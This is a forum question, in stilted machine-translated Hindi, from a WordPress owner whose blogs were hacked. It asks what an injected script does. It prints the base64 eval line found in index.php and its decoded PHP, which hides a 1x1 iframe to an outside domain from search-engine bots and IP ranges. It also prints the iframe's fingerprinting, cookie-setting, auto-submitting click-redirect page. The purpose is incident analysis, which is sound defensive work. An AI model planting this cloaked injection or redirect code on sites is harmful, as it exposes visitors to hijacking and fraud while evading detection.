10
मैं तीन वर्डप्रेस ब्लॉग बनाए रखता हूं, और कल सुबह, वे सभी हैंक किए गए थे। सब मेरी index.php पहली पंक्ति के अंदर देखा इस प्रकार है:वर्डप्रेस हैक किया गया: यह स्क्रिप्ट वास्तव में क्या करती है?
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly93dW1wZWFycG15LmN6LmNjL2dvLzEiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaWZyYW1lPic7DQp9'))
एक तरफ यह तय करने (जो काम किया है लगता है) से, मैं क्या प्रयोजन के लिए सोच रहा हूँ कि वह क्या करता है, और।
तो मैं डाला कोड डीकोड:
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ($stop_ips_masks as $IPs) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://wumpearpmy.cz.cc/go/1" width="1" height="1"></iframe>';
}
मोटे तौर पर, अगर मैं सही ढंग से समझ, यह एक अतिरिक्त iframe कुछ स्रोत इसे लोड करने की आवश्यकता होगी के साथ दिखाया जाएगा, लेकिन केवल तभी जब उपयोगकर्ता-एजेंट और आईपी हैं अवरुद्ध ips, या अवरुद्ध बॉट की सूची में नहीं। मेरा अनुमान है: यह सुनिश्चित करने के लिए कि मेरी साइट कालीसूचीबद्ध नहीं किया जाएगा, लेकिन किसी भी आगंतुक को अभी भी स्पैम किया जाएगा।
लेकिन मैं अभी भी उत्सुक था: वास्तव में यह क्या करता है?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<title>http://groupon.be</title>
<head>
<STYLE>
BODY {
BACKGROUND: #666; FONT: 100% Georgia, "Times New Roman", Times, serif; COLOR: #666
}
A {
COLOR: #fe701a
}
A:hover {
COLOR: #fdc336
}
P {
FONT: 105% century
}
.main_wrapper{
width:90%; margin:auto; border:10px solid #888888; background-color:#FFFFFF; margin-top:25px; height:450px;
}
.skipimage{margin:auto; text-align:center; height:30%}
.img_wrapper{background-image:url(continue.gif); background-position:top; background-repeat:no-repeat; width:435px; height:215px}
</style>
<script type="text/javascript">
function getCookie(name){var start=document.cookie.indexOf(name+"=");var len=start+name.length+1;if((!start)&&(name!=document.cookie.substring(0,name.length))){return null;}
if(start==-1)return null;var end=document.cookie.indexOf(';',len);if(end==-1)end=document.cookie.length;return unescape(document.cookie.substring(len,end));}function setCookie(name,value,expires,path,domain,secure){var today=new Date();today.setTime(today.getTime());
var expires_date=new Date(today.getTime()+(expires));document.cookie=name+'='+escape(value)+
((expires)?';expires='+expires_date.toGMTString():'')+
((path)?';path='+path:'')+
((domain)?';domain='+domain:'')+
((secure)?';secure':'');}
</script>
</head>
<body>
<form method="get" action="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names" name="rr">
<input type="hidden" name="sid" value="294787600" />
<input type="hidden" name="sa" value="13" />
<input type="hidden" name="p" value="1" />
<input type="hidden" name="s" value="98795" />
<input type="hidden" name="qt" value="1307865129" />
<input type="hidden" name="q" value="domain names" />
<input type="hidden" name="rf" value="" />
<input type="hidden" name="enc" value="" />
<input type="hidden" name="enk" value="RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm" />
<input type="hidden" name="xsc" value="" />
<input type="hidden" name="xsp" value="" />
<input type="hidden" name="xsm" value="" />
<input type="hidden" name="xuc" value=""/>
<input type="hidden" name="xcf" value=""/>
<input type="hidden" name="xai" value=""/>
<input type="hidden" name="qxcli" value="8904e76aaa70acee" />
<input type="hidden" name="qxsi" value="e0f63d5350e1c1d9" />
<input type="hidden" name="mk" value="1" />
<input type="hidden" name="ScreenX" value="0" />
<input type="hidden" name="ScreenY" value="0" />
<input type="hidden" name="BrowserX" value="0" />
<input type="hidden" name="BrowserY" value="0"/>
<input type="hidden" name="MouseX" value="0"/>
<input type="hidden" name="MouseY" value="0"/>
<input type="hidden" name="is_iframe" value="0"/>
</form>
<div class="main_wrapper">
<table width="60%" border="0" align="center" cellpadding="0" cellspacing="0" height="100%">
<tr>
<td align="center" valign="middle">
<table width="435" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="img_wrapper" >
<div style="width:60%; margin:auto;height:215px;">
<div class="skipimage" style="padding-top:40px;">
<!-- a href="javascript:void(0)" onclick="press();"><img src="skip.gif"/border="0"></a -->
<a href="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9"><img src="skip.gif"/border="0"></a>
</div>
<div class="skipimage">
<img src="ajax-loader.gif"/border="0">
<P><SPAN>Your request is loading...</SPAN></P>
</div>
</div>
</td>
</tr>
</table>
<br />
<p>If you are not redirected within 2 seconds <a href="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9">click here</a> to continue</p>
</td>
</tr>
</table>
</div>
<script type="text/javascript">
var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz));}
function core_md5(x,len){x[len>>5]|=0x80<<((len)%32);x[(((len+64)>>>9)<<4)+14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i+=16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i+0],7,-680876936);d=md5_ff(d,a,b,c,x[i+1],12,-389564586);c=md5_ff(c,d,a,b,x[i+2],17,606105819);b=md5_ff(b,c,d,a,x[i+3],22,-1044525330);a=md5_ff(a,b,c,d,x[i+4],7,-176418897);d=md5_ff(d,a,b,c,x[i+5],12,1200080426);c=md5_ff(c,d,a,b,x[i+6],17,-1473231341);b=md5_ff(b,c,d,a,x[i+7],22,-45705983);a=md5_ff(a,b,c,d,x[i+8],7,1770035416);d=md5_ff(d,a,b,c,x[i+9],12,-1958414417);c=md5_ff(c,d,a,b,x[i+10],17,-42063);b=md5_ff(b,c,d,a,x[i+11],22,-1990404162);a=md5_ff(a,b,c,d,x[i+12],7,1804603682);d=md5_ff(d,a,b,c,x[i+13],12,-40341101);c=md5_ff(c,d,a,b,x[i+14],17,-1502002290);b=md5_ff(b,c,d,a,x[i+15],22,1236535329);a=md5_gg(a,b,c,d,x[i+1],5,-165796510);d=md5_gg(d,a,b,c,x[i+6],9,-1069501632);c=md5_gg(c,d,a,b,x[i+11],14,643717713);b=md5_gg(b,c,d,a,x[i+0],20,-373897302);a=md5_gg(a,b,c,d,x[i+5],5,-701558691);d=md5_gg(d,a,b,c,x[i+10],9,38016083);c=md5_gg(c,d,a,b,x[i+15],14,-660478335);b=md5_gg(b,c,d,a,x[i+4],20,-405537848);a=md5_gg(a,b,c,d,x[i+9],5,568446438);d=md5_gg(d,a,b,c,x[i+14],9,-1019803690);c=md5_gg(c,d,a,b,x[i+3],14,-187363961);b=md5_gg(b,c,d,a,x[i+8],20,1163531501);a=md5_gg(a,b,c,d,x[i+13],5,-1444681467);d=md5_gg(d,a,b,c,x[i+2],9,-51403784);c=md5_gg(c,d,a,b,x[i+7],14,1735328473);b=md5_gg(b,c,d,a,x[i+12],20,-1926607734);a=md5_hh(a,b,c,d,x[i+5],4,-378558);d=md5_hh(d,a,b,c,x[i+8],11,-2022574463);c=md5_hh(c,d,a,b,x[i+11],16,1839030562);b=md5_hh(b,c,d,a,x[i+14],23,-35309556);a=md5_hh(a,b,c,d,x[i+1],4,-1530992060);d=md5_hh(d,a,b,c,x[i+4],11,1272893353);c=md5_hh(c,d,a,b,x[i+7],16,-155497632);b=md5_hh(b,c,d,a,x[i+10],23,-1094730640);a=md5_hh(a,b,c,d,x[i+13],4,681279174);d=md5_hh(d,a,b,c,x[i+0],11,-358537222);c=md5_hh(c,d,a,b,x[i+3],16,-722521979);b=md5_hh(b,c,d,a,x[i+6],23,76029189);a=md5_hh(a,b,c,d,x[i+9],4,-640364487);d=md5_hh(d,a,b,c,x[i+12],11,-421815835);c=md5_hh(c,d,a,b,x[i+15],16,530742520);b=md5_hh(b,c,d,a,x[i+2],23,-995338651);a=md5_ii(a,b,c,d,x[i+0],6,-198630844);d=md5_ii(d,a,b,c,x[i+7],10,1126891415);c=md5_ii(c,d,a,b,x[i+14],15,-1416354905);b=md5_ii(b,c,d,a,x[i+5],21,-57434055);a=md5_ii(a,b,c,d,x[i+12],6,1700485571);d=md5_ii(d,a,b,c,x[i+3],10,-1894986606);c=md5_ii(c,d,a,b,x[i+10],15,-1051523);b=md5_ii(b,c,d,a,x[i+1],21,-2054922799);a=md5_ii(a,b,c,d,x[i+8],6,1873313359);d=md5_ii(d,a,b,c,x[i+15],10,-30611744);c=md5_ii(c,d,a,b,x[i+6],15,-1560198380);b=md5_ii(b,c,d,a,x[i+13],21,1309151649);a=md5_ii(a,b,c,d,x[i+4],6,-145523070);d=md5_ii(d,a,b,c,x[i+11],10,-1120210379);c=md5_ii(c,d,a,b,x[i+2],15,718787259);b=md5_ii(b,c,d,a,x[i+9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd);} return Array(a,b,c,d);}
function md5_cmn(q,a,b,x,s,t){return safe_add(bit_rol(safe_add(safe_add(a,q),safe_add(x,t)),s),b);}function md5_ff(a,b,c,d,x,s,t){return md5_cmn((b&c)|((~b)&d),a,b,x,s,t);}function md5_gg(a,b,c,d,x,s,t){return md5_cmn((b&d)|(c&(~d)),a,b,x,s,t);}function md5_hh(a,b,c,d,x,s,t){return md5_cmn(b^c^d,a,b,x,s,t);}function md5_ii(a,b,c,d,x,s,t){return md5_cmn(c^(b|(~d)),a,b,x,s,t);}function safe_add(x,y){var lsw=(x&0xFFFF)+(y&0xFFFF);var msw=(x>>16)+(y>>16)+(lsw>>16);return(msw<<16)|(lsw&0xFFFF);}function bit_rol(num,cnt){return(num<<cnt)|(num>>>(32-cnt));}function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i+=chrsz) bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i%32);return bin;}function binl2hex(binarray){var hex_tab=hexcase?"ABCDEF":"abcdef";var str="";for(var i=0;i<binarray.length*4;i++) {str+=hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4))&0xF)+ hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&0xF);} return str;}
/* function getCookie(cookiename){ var cookiestring=""+document.cookie; var index1=cookiestring.indexOf(cookiename); if(index1==-1 || cookiename=="") return ""; var index2=cookiestring.indexOf(';',index1); if (index2==-1) index2=cookiestring.length; return unescape(cookiestring.substring(index1+cookiename.length+1,index2));} */
function add_ch(n,v){ if(v) { window.dch +="["+n+":"+enc_data(v)+"]";}}function enc_data(b){ if(typeof encodeURIComponent=="function") { return encodeURIComponent(b);} else {return escape(b);}}function G() {var dt = new Date(); if(!window.dch) { window.dch = "";} if(screen) { add_ch("h",screen.height); add_ch("w",screen.width); add_ch("cd",screen.colorDepth);} add_ch("tz", -dt.getTimezoneOffset()); add_ch("jv", navigator.javaEnabled()); if (navigator.plugins) { add_ch("pg",navigator.plugins.length); } if (navigator.mimeTypes) { add_ch("mm",navigator.mimeTypes.length); } add_ch('ua', navigator.userAgent); add_ch('ts', Date.parse(dt)); tr = hex_md5(dch); setCookie('xch', tr, 63072000000, '/', '', '');}function gsc(){if(!getCookie("xch")){G();}} gsc();
// global variable
var screenwidth;
var screenheight;
var viewportwidth;
var viewportheight;
var myMouseX, myMouseY;
var event_flag = false;
//window.onload = press;
function press(){
var dim = screenDimension();
document.forms['rr'].ScreenX.value = dim[0];
document.forms['rr'].ScreenY.value = dim[1];
// Browser X*Y
var dim_browser = browserDimension();
document.forms['rr'].BrowserX.value = dim_browser[0];
document.forms['rr'].BrowserY.value = dim_browser[1];
if((window.top!=window.self)){
document.forms['rr'].is_iframe.value = 1;
}
// document.onmousemove=getXYPosition; // start event listener
if (getCookie('mrc') != "groupon.be") {
setCookie('mrc', 'groupon.be', 180000, '/', '.maximumspeedfind.com', '');
document.forms['rr'].submit();
}else{
document.forms['rr'].action = 'http://clicks.maximumspeedfind.com/xtr2_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9';
document.forms['rr'].submit();
}
}
/*
// mouse postion
function getXYPosition(e){
if(!event_flag){
// console.debug(e);
myMouseX = mouseXPos(e);
myMouseY = mouseYPos(e);
document.forms['rr'].MouseX.value = myMouseX;
document.forms['rr'].MouseY.value = myMouseY;
event_flag = true;
}
}
*/
// Screen
function screenDimension(){
if (typeof screen.width != 'undefined' && typeof screen.height != 'undefined')
{
screenwidth = screen.width;
screenheight = screen.height;
}
return [screenwidth,screenheight];
}
// Browser
function browserDimension(){
// the more standards compliant browsers (mozilla/netscape/opera/IE7) use window.innerWidth and window.innerHeight
if (typeof window.innerWidth != 'undefined')
{
viewportwidth = window.innerWidth,
viewportheight = window.innerHeight
}
// IE6 in standards compliant mode (i.e. with a valid doctype as the first line in the document)
else if (typeof document.documentElement != 'undefined' && typeof document.documentElement.clientWidth != 'undefined' && document.documentElement.clientWidth != 0)
{
viewportwidth = document.documentElement.clientWidth,
viewportheight = document.documentElement.clientHeight
}
// older versions of IE
else
{
viewportwidth = document.getElementsByTagName('body')[0].clientWidth,
viewportheight = document.getElementsByTagName('body')[0].clientHeight
}
var my = [viewportwidth,viewportheight];
return [viewportwidth,viewportheight];
//document.write('<p>Your viewport width is '+viewportwidth+'x'+viewportheight+'</p>');
}
/*
// Mouse postion
function mouseXPos(evt) {
if (evt.pageX)
return evt.pageX;
else if (evt.clientX)
return evt.clientX + (document.documentElement.scrollLeft ?document.documentElement.scrollLeft :document.body.scrollLeft);
else return null;
}
function mouseYPos(evt) {
if (evt.pageY) return evt.pageY;
else if (evt.clientY)
return evt.clientY + (document.documentElement.scrollTop ?document.documentElement.scrollTop :document.body.scrollTop);
else return null;
}
*/
press();
</script>
</body>
</html>
ठीक है:
तो मैं RestClient का उपयोग करने और निम्नलिखित लौटे एचटीएमएल मिल http://wumpearpmy.cz.cc/go/1 के लिए लिंक का पालन किया। मैं groupon.com पढ़ सकता हूं, लेकिन मुझे लगता है कि यह सिर्फ नकली है (बहुत स्पष्ट है?) और यह कुकी के अस्तित्व की जांच करेगा? कौन सी कुकी? मैं तुरंत इसे कम नहीं कर सका। और यह दो सेकंड के भीतर क्लिक करेगा। Maximumspeedfind.com। मैंने ऐसा करने की कोशिश नहीं की। यह सुनिश्चित करने के लिए बहुत सारे कोड खिड़की छोटे, लगभग अदृश्य रहते हैं। लेकिन ऐसा लगता है कि बहुत सारे obfuscated कोड भी हैं।
क्या कोई मुझे बता सकता है कि वे यहां क्या करने की कोशिश कर रहे हैं? और कैसे?
क्या यह कुछ क्लिक-थ्रू दर वे नकली करने की कोशिश कर रहे हैं? (शायद बेवकूफ)।